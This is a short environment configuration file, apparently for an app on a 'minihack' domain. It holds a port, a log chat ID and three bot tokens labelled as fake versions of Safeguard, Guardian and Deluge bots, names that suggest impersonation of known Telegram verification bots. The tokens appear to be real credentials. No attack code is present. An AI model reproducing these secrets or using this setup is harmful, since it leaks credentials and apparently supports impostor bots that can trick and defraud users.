PORT=3000
FAKE_SAFEGUARD_BOT_TOKEN=7573632233:AAFwet5tq8cqdjde0SlQwt53xoqFznxF76s
FAKE_GUARDIAN_BOT_TOKEN=7977110011:AAFP45ylq5Rs8PYZZI_3cqT_Y56VnvGZDr0
FAKE_DELUGE_BOT_TOKEN=7926392816:AAE6hsi1pWKF9wCiduTVhD7QuuB5ICHKsl8
LOGS_ID=841384457
DOMAIN=https://app.minihack.xyz